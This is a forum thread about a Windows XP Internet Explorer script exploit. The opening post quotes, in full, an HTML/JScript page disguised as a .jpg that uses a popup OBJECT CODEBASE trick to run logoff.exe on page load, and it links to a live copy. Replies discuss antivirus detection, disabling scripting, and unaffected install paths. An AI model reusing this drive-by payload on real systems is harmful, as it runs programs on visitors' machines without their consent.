XP very vunreable for scripts..

  • Thread starter Thread starter ScIveRXP
  • Start date Start date
S

ScIveRXP

Guest
Hello - well I found out lately that its really easy to make an XP pc logout - I was direct to a webpage with a .jpg - I thought what could go wrong..

well the .jpg had this as the content :
Code: 
<HTML>
	<HEAD>
		<SCRIPT language=JScript>
			var programName=new Array(
				'c:/windows/system32/logoff.exe',
				'c:/winxp/system32/logoff.exe',
				'c:/winnt/system32/logoff.exe'
			);

			function Init(){
				var oPopup=window.createPopup();
				var oPopBody=oPopup.document.body;
				var n,html='';
				for(n=0;n<programName.length;n++)
				html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
				oPopBody.innerHTML=html;
				oPopup.show(290, 390, 200, 200, document.body);
			}
		</SCRIPT>
	</HEAD>
	<BODY onload="Init()">
	You should feel lucky if you dont have XP right now.
	</BODY>
</HTML>

So I saw something and before I knew my XP logged me off.. I asked the maker of this script and he said it was even possible to add users to a system..

If you haven't got XP installed in a standard dir like stated above then you are save - but else its very easy to do harm to XP users...

WOW !!

Don't believe me !? http://www.phphq.nl/xp.jpg (save your work before clicking on this link !!)
 
M

MaDCeLL

Guest
*ouch* that hurts...

thx a million 4 da info *scriptingdeactivated*
 
W

WebDome

Guest
Just visit this page, so he is using js exploit, easy detectible by AV software. If you are using AV, update your windows XP with critical updates you are out of trouble. By the way I am running Win XP Pro and it couldn't shout me down.
 
Shamus MacNoob

Shamus MacNoob

OSNN Veteran Addict
Political Access
Joined
8 Jan 2002
Messages
4,199
Well I am on XP pro as well and I needed to set active scripting off in IE because that exploit was not detected by NAV2002 and all my security patches are up to date at microshot ......and I would be logged off ...... now I am ok but still somethings not right NAV2002 should not let that happen?? ..........
 
W

WebDome

Guest
Norton, neither Mcafee is not a good choice of AV. Try Kaspersky (known as KAV), or NOD 32 (Esset Antivirus).
 
R

Raven76

Guest
Hmmm...my installation is on the D:\ drive so I'm unaffected. That could be a nasty trick if it got you at a bad time.
 
D

dickow

Guest
I have Norton 2002 installed with scripting protection on, tried the web site, and it didn't shut me down on my XP system, so something is working ok.
 
T

Twink

Guest
heh, boy am I glad I f*cked my install, I got c:\windows.0\ so it don't affect me =D
 
G

Gnu

OSNN Addict
Joined
20 Jun 2004
Messages
129
That's actually pretty shoddy programming ... you can call windir in just about any API.
 
You must log in or register to reply here.

Members online

No members online now.
Total: 22 (members: 0, guests: 22)

Affiliates

lunarsoft.net techzonez.com

- Contact us to trade links -

OSNN OSNN NTFS XP-erience

Latest profile posts

Xie
Xie Electronic Punk Xie wrote on Electronic Punk's profile.
Impressed you have kept this alive this long EP! So many sites have come and gone. 🙁

Just did some crude math and I apparently joined almost 18yrs ago, how is that possible???
•••
N
Nismo83
hello peeps... is been some time since i last came here.
•••
Electronic Punk
Electronic Punk Sazar Electronic Punk wrote on Sazar's profile.
Rest in peace my friend, been trying to find you and finally did in the worst way imaginable.
•••
Terrahertz
Terrahertz Electronic Punk Terrahertz wrote on Electronic Punk's profile.
Yo fellas!
•••
Electronic Punk
Electronic Punk Sazar Electronic Punk wrote on Sazar's profile.
Where are you buddy?
•••

Forum statistics

Threads
62,017
Messages
673,508
Members
5,636
Latest member
GLOCKTOR642
Back